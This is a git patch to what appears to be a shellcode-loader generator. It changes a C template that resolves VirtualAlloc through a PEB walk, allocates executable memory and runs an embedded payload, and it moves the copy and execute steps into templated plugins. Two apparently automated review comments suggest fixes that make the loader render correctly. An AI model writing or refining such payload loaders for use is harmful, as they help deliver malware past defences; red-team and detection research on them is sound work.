From 2029be0ce854a333932fb7908003b5b8605943b3 Mon Sep 17 00:00:00 2001
From: Dobin
Date: Sun, 18 Feb 2024 22:51:10 +0000
Subject: [PATCH] feature: peb_walk template
---
phases/templater.py | 3 +++
source/peb_walk/template.c | 15 ++++++++-------
2 files changed, 11 insertions(+), 7 deletions(-)
diff --git a/phases/templater.py b/phases/templater.py
index f766b90..36dac9a 100644
--- a/phases/templater.py
+++ b/phases/templater.py
@@ -46,6 +46,9 @@ def create_c_from_template(
filepath = "plugins/executor/{}.c".format(exec_style.value)
with open("plugins/executor/direct_1.c", "r", encoding='utf-8') as file:
plugin_executor = file.read()
+ plugin_executor = Template(plugin_executor).render({
+ 'PAYLOAD_LEN': payload_len,
+ })
if source_style == SourceStyle.peb_walk:
if use_templates:
diff --git a/source/peb_walk/template.c b/source/peb_walk/template.c
index 2a2021c..9d8ce5a 100644
--- a/source/peb_walk/template.c
+++ b/source/peb_walk/template.c
@@ -85,14 +85,15 @@ int main()
_In_ DWORD flProtect)) _GetProcAddress((HMODULE)base, VirtualAlloc_str);
if (_VirtualAlloc == NULL) return 4;
char *dest = _VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, 0x40);
- // 11223344 is a magic number which will be replaced in the asm source
- // with the payload length.
- for(int n=0; n<{{PAYLOAD_LEN}}; n++) {
- dest[n] = supermega_payload[n];
- }
- // Exec shellcode
- (*(void(*)())(dest))();
+ // Copy
+ // from: supermega_payload[]
+ // to: dest[]
+ // len: 0x11223344
+{{ plugin_decoder }}
+
+ // Execute *dest
+{{ plugin_executor }}
return 0;
}
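Review bot: The new render is applied to the contents of the hard-coded `plugins/executor/direct_1.c`, while the `filepath` built from `exec_style.value` on the line above is never opened, so the chosen executor style has no effect on what gets templated; if that is not a deliberate stub, the open should read `with open(filepath, "r", encoding='utf-8') as file:`. If `Template` here is jinja2's (the `{{ }}` placeholders suggest it), an undefined name in the plugin renders as an empty string by default, which would silently produce malformed C rather than failing; `Template(plugin_executor, undefined=StrictUndefined)` (with `from jinja2 import StrictUndefined`) turns that into a render-time error. Only `PAYLOAD_LEN` is passed to the executor render, so any other placeholder in the executor plugin would hit exactly that case. create_c_from_template starts before the hunk and continues after it.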
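Review bot: The new comment `// len: 0x11223344` restates the magic-number scheme that the removed copy loop used, but nothing left in the hunk references it: the allocation two lines above is sized with `{{PAYLOAD_LEN}}`, and the copy is now delegated to `{{ plugin_decoder }}`, whose length is decided wherever that plugin is rendered (the first hunk renders only `plugin_executor` with `PAYLOAD_LEN`; the decoder's render is not visible here). If the decoder copies more bytes than `_VirtualAlloc` was asked for, the write runs past the allocated region, so the contract should be stated where it is easy to check: replace the `len:` line with `// len: {{PAYLOAD_LEN}} bytes - must match the _VirtualAlloc size above`. Note also that the two placeholder lines sit at column 0, so the rendered plugin bodies will only be indented with the surrounding function if the plugin files carry their own indentation. main() starts before the hunk.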